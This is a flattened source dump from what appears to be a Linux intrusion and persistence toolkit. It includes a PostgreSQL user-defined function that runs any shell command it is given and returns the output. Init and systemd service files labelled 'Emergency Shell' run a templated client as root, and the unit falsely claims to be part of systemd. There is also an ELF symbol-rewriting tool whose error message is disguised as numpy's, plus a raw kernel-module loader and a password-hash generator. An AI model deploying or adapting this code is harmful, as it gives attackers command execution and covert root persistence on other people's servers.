-fno-jump-tables -Os -g0 -I%%POSTGRES_I_DIR%% -I./-. 5 | LDFLAGS = -shared -Wl,--build-id=none,-z,relro,-z,now 6 | 7 | TARGET = UDF.so 8 | SOURCES = UDF.c 9 | OBJECTS = $(SOURCES:.c=.o) 10 | 11 | $(TARGET): $(OBJECTS) 12 | $(CC) $(FLAGS) $(CFLAGS) $^ -o $@ $(LDFLAGS) 13 | 14 | clean: 15 | rm -rf $(OBJECTS) $(TARGET) 16 | -------------------------------------------------------------------------------- /src/POSTGRES/UDF.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #ifdef PG_MODULE_MAGIC 6 | PG_MODULE_MAGIC; 7 | #endif 8 | 9 | PG_FUNCTION_INFO_V1(%%POSTGRES_NAME%%); 10 | #if PG_VERSION_NUM < 80300 11 | extern DLLIMPORT Datum %%POSTGRES_NAME%%(PG_FUNCTION_ARGS){ 12 | #elif PG_VERSION_NUM >= 80300 13 | extern PGDLLIMPORT Datum %%POSTGRES_NAME%%(PG_FUNCTION_ARGS){ 14 | #endif 15 | text *argv0 = PG_GETARG_TEXT_P(0), *result_text; 16 | int32 argv0_size = VARSIZE(argv0) - VARHDRSZ, outlen = 0, linelen; 17 | char *command = (char *)malloc(argv0_size + 1), *result, line[1024]; 18 | FILE *pipe; 19 | 20 | memcpy(command, VARDATA(argv0), argv0_size); 21 | command[argv0_size] = '\0'; 22 | result = (char *)malloc(1); 23 | pipe = popen(command, "r"); 24 | while (fgets(line, sizeof(line), pipe) != NULL) { 25 | linelen = strlen(line); 26 | result = (char *)realloc(result, outlen + linelen); 27 | strncpy(result + outlen, line, linelen); 28 | outlen = outlen + linelen; 29 | } 30 | pclose(pipe); 31 | if (*result) 32 | result[outlen-1] = 0x00; 33 | result_text = (text *)malloc(VARHDRSZ + strlen(result)); 34 | #if PG_VERSION_NUM < 80300 35 | VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ; 36 | #elif PG_VERSION_NUM >= 80300 37 | SET_VARSIZE(result_text, VARHDRSZ + strlen(result)); 38 | #endif 39 | memcpy(VARDATA(result_text), result, strlen(result)); 40 | PG_RETURN_POINTER(result_text); 41 | } 42 | -------------------------------------------------------------------------------- /src/SERVICE/init.service: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ### BEGIN INIT INFO 3 | # Provides: %%NS_NAME%% 4 | # Required-Start: $local_fs $network $named $time $syslog 5 | # Required-Stop: $local_fs $network $named $time $syslog 6 | # Default-Start: 2 3 4 5 7 | # Default-Stop: 0 1 6 8 | # Description: Emergency Shell 9 | ### END INIT INFO 10 | 11 | SCRIPT="%%CLIENT%%" 12 | RUNAS=root 13 | 14 | PIDFILE=/var/run/%%NS_NAME%%.pid 15 | 16 | start() { 17 | echo 'Starting service…' >&2 18 | local CMD="$SCRIPT" 19 | su -g %%MGID_NAME%% -c '"$CMD" $RUNAS' > "$PIDFILE" 20 | sleep 2 21 | PID=$(cat $PIDFILE) 22 | if pgrep -u $RUNAS -f $NAME > /dev/null; then 23 | echo "$NAME is now running, the PID is $PID" 24 | else 25 | echo '' 26 | echo "Error! Could not start $NAME!" 27 | fi 28 | } 29 | 30 | stop() { 31 | if [ ! -f "$PIDFILE" ] || ! kill -0 $(cat "$PIDFILE"); then 32 | echo 'Service not running' >&2 33 | return 1 34 | fi 35 | echo 'Stopping service…' >&2 36 | kill -15 $(cat "$PIDFILE") && rm -f "$PIDFILE" 37 | echo 'Service stopped' >&2 38 | } 39 | 40 | status() { 41 | printf "%-50s" "Checking ..." 42 | if [ -f $PIDFILE ] && [ -s $PIDFILE ]; then 43 | PID=$(cat $PIDFILE) 44 | if [ -z "$(ps axf | grep ${PID} | grep -v grep)" ]; then 45 | printf "%s\n" "The process appears to be dead but pidfile still exists" 46 | else 47 | echo "Running, the PID is $PID" 48 | fi 49 | else 50 | printf "%s\n" "Service not running" 51 | fi 52 | } 53 | 54 | 55 | case "$1" in 56 | start) 57 | start 58 | ;; 59 | stop) 60 | stop 61 | ;; 62 | status) 63 | status 64 | ;; 65 | restart) 66 | stop 67 | start 68 | ;; 69 | *) 70 | echo "Usage: $0 {start|stop|status|restart}" 71 | ;; 72 | esac 73 | -------------------------------------------------------------------------------- /src/SERVICE/main.service: -------------------------------------------------------------------------------- 1 | # This file is part of systemd. 2 | # 3 | # systemd is free software; you can redistribute it and/or modify it 4 | # under the terms of the GNU Lesser General Public License as published by 5 | # the Free Software Foundation; either version 2.1 of the License, or 6 | # (at your option) any later version. 7 | 8 | [Unit] 9 | Description=Emergency Shell 10 | After=network.target 11 | StartLimitIntervalSec=0 12 | 13 | [Service] 14 | Type=simple 15 | Restart=on-failure 16 | RestartSec=1 17 | ExecStart=su -g %%MGID_NAME%% -c '%%CLIENT%% %%UUID%%' 18 | KillMode=process 19 | 20 | [Install] 21 | WantedBy=multi-user.target 22 | -------------------------------------------------------------------------------- /src/SSHD/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/5c8b03f54c3f3e05b80c7d97893163c4907ac5b8/src/SSHD/.keep -------------------------------------------------------------------------------- /src/TOOLS/elfchngr.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #undef ELF_ST_BIND 8 | #undef ELF_ST_INFO 9 | #if defined(__i386__) || defined(i386) || defined(_M_IX86) 10 | typedef Elf32_Ehdr T_ehdr; 11 | typedef Elf32_Shdr T_shdr; 12 | typedef Elf32_Sym T_sym; 13 | typedef Elf32_Off T_off; 14 | typedef Elf32_Addr T_addr; 15 | typedef Elf32_Word T_word; 16 | typedef Elf32_Half T_half; 17 | #define ELF_ST_BIND ELF32_ST_BIND 18 | #define ELF_ST_INFO ELF32_ST_INFO 19 | #elif defined(__x86_64__) || defined(__amd64__) || defined(__x86_64) || defined(_M_AMD64) 20 | typedef Elf64_Ehdr T_ehdr; 21 | typedef Elf64_Shdr T_shdr; 22 | typedef Elf64_Sym T_sym; 23 | typedef Elf64_Off T_off; 24 | typedef Elf64_Addr T_addr; 25 | typedef Elf64_Word T_word; 26 | typedef Elf64_Half T_half; 27 | #define ELF_ST_BIND ELF64_ST_BIND 28 | #define ELF_ST_INFO ELF64_ST_INFO 29 | #else 30 | #error Unknown CPU, please report this to numpy maintainers with information about your platform (OS, CPU and compiler) 31 | #endif 32 | 33 | int ElfGetSectionByName(FILE *fd, T_ehdr *ehdr, char *section, T_shdr *shdr); 34 | int ElfGetSectionName(FILE *fd, T_word sh_name, T_shdr *shstrtable, char *res, size_t len); 35 | T_off ElfGetSymbolByName(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name, T_sym *sym); 36 | void ElfGetSymbolName(FILE *fd, T_word sym_name, T_shdr *strtable, char *res, size_t len); 37 | unsigned long ReorderSymbols(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name); 38 | int ReoderRelocation(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name, T_sym *sym); 39 | int ElfGetSectionByIndex(FILE *fd, T_ehdr *ehdr, T_half index, T_shdr *shdr); 40 | 41 | int main(int argc, char **argv){ 42 | FILE *fd; 43 | T_ehdr hdr; 44 | T_shdr symtab, strtab; 45 | T_sym sym; 46 | T_off symoffset; 47 | T_addr value; 48 | unsigned long new_index = 0; 49 | int gflag = 0, vflag = 0, fflag = 0, sym_value = 0, opt; 50 | char *sym_name; 51 | long sym_off, str_off; 52 | if(argc != 4 && argc != 6) 53 | exit(-1); 54 | while((opt = getopt(argc, argv, "vsg")) != -1){ 55 | switch(opt){ 56 | case 'g': 57 | if(argc-1 < optind) 58 | exit(-2); 59 | gflag = 1; 60 | sym_name = argv[optind]; 61 | break; 62 | case 's': 63 | if(argc-1 < optind) 64 | exit(-3); 65 | fflag = 1; 66 | sym_name = argv[optind]; 67 | break; 68 | case 'v': 69 | if(argc-1 < optind) 70 | exit(-4); 71 | vflag = 1; 72 | sym_value = strtol(argv[optind], (char **)NULL, 16); 73 | break; 74 | default: 75 | exit(-5); 76 | } 77 | } 78 | fd = fopen(argv[argc-1], "r+"); 79 | if(fd == NULL) 80 | exit(-6); 81 | if(fread(&hdr, sizeof(T_ehdr), 1, fd) < 1) 82 | exit(-7); 83 | sym_off = ElfGetSectionByName(fd, &hdr, ".symtab", &symtab); 84 | if(sym_off == -1) 85 | exit(-8); 86 | str_off = ElfGetSectionByName(fd, &hdr, ".strtab", &strtab); 87 | if(str_off == -1) 88 | exit(-9); 89 | symoffset = ElfGetSymbolByName(fd, &symtab, &strtab, sym_name, &sym); 90 | if((int)symoffset == -1) 91 | exit(-10); 92 | if(gflag == 1) 93 | if(ELF_ST_BIND(sym.st_info) == STB_LOCAL){ 94 | unsigned char global; 95 | unsigned long offset = 0; 96 | new_index = ReorderSymbols(fd, &symtab, &strtab, sym_name); 97 | symoffset = ElfGetSymbolByName(fd, &symtab, &strtab, sym_name, &sym); 98 | if((int)symoffset == -1) 99 | exit(-11); 100 | offset = symoffset + 1 + sizeof(T_addr) + 1 + sizeof(T_word)+2; 101 | if(fseek(fd, offset, SEEK_SET) == -1) 102 | exit(-12); 103 | global = ELF_ST_INFO(STB_GLOBAL, STT_FUNC); 104 | if(fwrite(&global, sizeof(unsigned char), 1, fd) < 1) 105 | exit(-13); 106 | if(fseek(fd, sym_off, SEEK_SET) == -1) 107 | exit(-14); 108 | symtab.sh_info = new_index; 109 | if(fwrite(&symtab, sizeof(T_shdr), 1, fd) < 1) 110 | exit(-15); 111 | }else{} 112 | else if(fflag == 1 && vflag == 1){ 113 | memset(&value, 0, sizeof(T_addr)); 114 | memcpy(&value, &sym_value, sizeof(T_addr)); 115 | #if defined(__i386__) || defined(i386) || defined(_M_IX86) 116 | if(fseek(fd, symoffset + sizeof(T_word), SEEK_SET) == -1) 117 | #elif defined(__x86_64__) || defined(__amd64__) || defined(__x86_64) || defined(_M_AMD64) 118 | if(fseek(fd, symoffset + sizeof(T_word) + 2 * sizeof(unsigned char) + sizeof(T_half), SEEK_SET) == -1) 119 | #endif 120 | exit(-16); 121 | if(fwrite(&value, sizeof(T_addr), 1, fd) < 1) 122 | exit(-17); 123 | fclose(fd); 124 | } 125 | return 0; 126 | } 127 | 128 | T_off ElfGetSymbolByName(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name, T_sym *sym){ 129 | unsigned int i; 130 | char symname[255]; 131 | for(i=0;i<(symtab->sh_size/symtab->sh_entsize);i++){ 132 | if(fseek(fd, symtab->sh_offset + (i * symtab->sh_entsize), SEEK_SET) == -1) 133 | exit(-18); 134 | if(fread(sym, sizeof(T_sym), 1, fd) < 1) 135 | exit(-19); 136 | memset(symname, 0, sizeof(symname)); 137 | ElfGetSymbolName(fd, sym->st_name, strtab, symname, sizeof(symname)); 138 | if(!strcmp(symname, name)) 139 | return symtab->sh_offset + (i * symtab->sh_entsize); 140 | } 141 | return -1; 142 | } 143 | 144 | unsigned long ReorderSymbols(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name){ 145 | unsigned int i = 0, j = 0; 146 | char symname[255]; 147 | T_sym *all, temp; 148 | unsigned long new_index = 0, my_off = 0; 149 | all = (T_sym *)malloc(sizeof(T_sym) * (symtab->sh_size/symtab->sh_entsize)); 150 | if(all == NULL) 151 | return -1; 152 | memset(all, 0, symtab->sh_size/symtab->sh_entsize); 153 | my_off = symtab->sh_offset; 154 | for(i = 0; i < (symtab->sh_size/symtab->sh_entsize); i++){ 155 | if(fseek(fd, symtab->sh_offset + (i * symtab->sh_entsize), SEEK_SET) == -1) 156 | exit(-20); 157 | if(fread(&all[i], sizeof(T_sym), 1, fd) < 1) 158 | exit(-21); 159 | memset(symname, 0, sizeof(symname)); 160 | ElfGetSymbolName(fd, all[i].st_name, strtab, symname, sizeof(symname)); 161 | if(!strcmp(symname, name)){ 162 | j = i; 163 | continue; 164 | } 165 | } 166 | temp = all[j]; 167 | for(i = j; i < (symtab->sh_size/symtab->sh_entsize); i++){ 168 | if(i+1 >= symtab->sh_size/symtab->sh_entsize) 169 | break; 170 | if(ELF_ST_BIND(all[i+1].st_info) == STB_LOCAL) 171 | all[i] = all[i+1]; 172 | else { 173 | new_index = i; 174 | all[i] = temp; 175 | break; 176 | } 177 | } 178 | if(fseek(fd, my_off, SEEK_SET) == -1) 179 | exit(-22); 180 | if(fwrite(all, sizeof(T_sym), symtab->sh_size/symtab->sh_entsize, fd) < (symtab->sh_size/symtab->sh_entsize)) 181 | exit(-23); 182 | free(all); 183 | return new_index; 184 | } 185 | 186 | int ElfGetSectionByIndex(FILE *fd, T_ehdr *ehdr, T_half index, T_shdr *shdr){ 187 | if(fseek(fd, ehdr->e_shoff + (index * ehdr->e_shentsize), SEEK_SET) == -1) 188 | exit(-24); 189 | if(fread(shdr, sizeof(T_shdr), 1, fd) < 1) 190 | exit(-25); 191 | return 0; 192 | } 193 | 194 | int ElfGetSectionByName(FILE *fd, T_ehdr *ehdr, char *section, T_shdr *shdr){ 195 | int i; 196 | char name[255]; 197 | T_shdr shstrtable; 198 | ElfGetSectionByIndex(fd, ehdr, ehdr->e_shstrndx, &shstrtable); 199 | memset(name, 0, sizeof(name)); 200 | for(i = 0; i < ehdr->e_shnum; i++){ 201 | if(fseek(fd, ehdr->e_shoff + (i * ehdr->e_shentsize), SEEK_SET) == -1) 202 | exit(-26); 203 | if(fread(shdr, sizeof(T_shdr), 1, fd) < 1) 204 | exit(-27); 205 | ElfGetSectionName(fd, shdr->sh_name, &shstrtable, name, sizeof(name)); 206 | if(!strcmp(name, section)) 207 | return ehdr->e_shoff + (i * ehdr->e_shentsize); 208 | } 209 | return -1; 210 | } 211 | 212 | int ElfGetSectionName(FILE *fd, T_word sh_name, T_shdr *shstrtable, char *res, size_t len){ 213 | size_t i = 0; 214 | if(fseek(fd, shstrtable->sh_offset + sh_name, SEEK_SET) == -1) 215 | exit(-28); 216 | while((i < len-1) || *res != '\0'){ 217 | *res = fgetc(fd); 218 | i++; 219 | res++; 220 | } 221 | return 0; 222 | } 223 | 224 | void ElfGetSymbolName(FILE *fd, T_word sym_name, T_shdr *strtable, char *res, size_t len){ 225 | size_t i = 0; 226 | if(fseek(fd, strtable->sh_offset + sym_name, SEEK_SET) == -1) 227 | exit(-29); 228 | while((i < len-1) || *res != '\0'){ 229 | *res = fgetc (fd); 230 | i++; 231 | res++; 232 | } 233 | return; 234 | } 235 | -------------------------------------------------------------------------------- /src/TOOLS/loader.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #define init_module(module_image, len, param_values) syscall(__NR_init_module, module_image, len, param_values) 12 | 13 | int main(int argc, char **argv){ 14 | int fd, ret = EXIT_FAILURE; 15 | struct stat st; 16 | size_t len; 17 | void *module_image; 18 | if (argc < 2) 19 | return ret; 20 | fd = open(argv[1], O_RDONLY); 21 | fstat(fd, &st); 22 | len = st.st_size; 23 | module_image = malloc(len); 24 | read(fd, module_image, len); 25 | ret = init_module(module_image, len, ""); 26 | free(module_image); 27 | close(fd); 28 | return ret; 29 | } 30 | -------------------------------------------------------------------------------- /src/TOOLS/passgen.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int main(int argc, char *argv[]){ 8 | if (argc < 3 || (int) strlen(argv[2]) > 16) 9 | return 1; 10 | char salt[21]; 11 | sprintf(salt, "$6$%s$", argv[2]); 12 | printf("%s\n", crypt((char*) argv[1], (char*) salt)); 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /src/TOOLS/skipcpio.c: -------------------------------------------------------------------------------- 1 | #define PROGRAM_VERSION_STRING "1" 2 | #define _GNU_SOURCE 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define CPIO_END "TRAILER!!!" 10 | #define CPIO_ENDLEN (sizeof(CPIO_END)-1) 11 | 12 | static char buf[CPIO_ENDLEN * 2 + 1]; 13 | 14 | int main(int argc, char **argv){ 15 | FILE *f; 16 | size_t s; 17 | if(argc != 2){ 18 | fprintf(stderr, "Usage: %s \n", argv[0]); 19 | exit(1); 20 | } 21 | f = fopen(argv[1], "r"); 22 | if(f == NULL){ 23 | fprintf(stderr, "Cannot open file '%s'\n", argv[1]); 24 | exit(1); 25 | } 26 | s = fread(buf, 6, 1, f); 27 | if(s <= 0){ 28 | fprintf(stderr, "Read error from file '%s'\n", argv[1]); 29 | fclose(f); 30 | exit(1); 31 | } 32 | fseek(f, 0, SEEK_SET); 33 | if(buf[0] == '0' && buf[1] == '7' && buf[2] == '0' && buf[3] == '7' && buf[4] == '0' && buf[5] == '1'){ 34 | long pos = 0; 35 | do{ 36 | char *h; 37 | fseek(f, pos, SEEK_SET); 38 | buf[sizeof(buf) - 1] = 0; 39 | s = fread(buf, CPIO_ENDLEN, 2, f); 40 | if(s <= 0) 41 | break; 42 | h = strstr(buf, CPIO_END); 43 | if(h){ 44 | pos = (h - buf) + pos + CPIO_ENDLEN; 45 | fseek(f, pos, SEEK_SET); 46 | break; 47 | } 48 | pos += CPIO_ENDLEN; 49 | } while(!feof(f)); 50 | if(feof(f)) 51 | fseek(f, 0, SEEK_SET); 52 | else{ 53 | while(!feof(f)){ 54 | size_t i; 55 | buf[sizeof(buf) - 1] = 0; 56 | s = fread(buf, 1, sizeof(buf) - 1, f); 57 | if(s <= 0) 58 | break; 59 | for(i = 0; (i < s) && (buf[i] == 0); i++); 60 | if (buf[i] != 0){ 61 | pos += i; 62 | fseek(f, pos, SEEK_SET); 63 | break; 64 | } 65 | pos += s; 66 | } 67 | } 68 | } 69 | while (!feof(f)){ 70 | s = fread(buf, 1, sizeof(buf), f); 71 | if (s <= 0) 72 | break; 73 | s = fwrite(buf, 1, s, stdout); 74 | if (s <= 0) 75 | break; 76 | } 77 | fclose(f); 78 | return EXIT_SUCCESS; 79 | } 80 | --------------------------------------------------------------------------------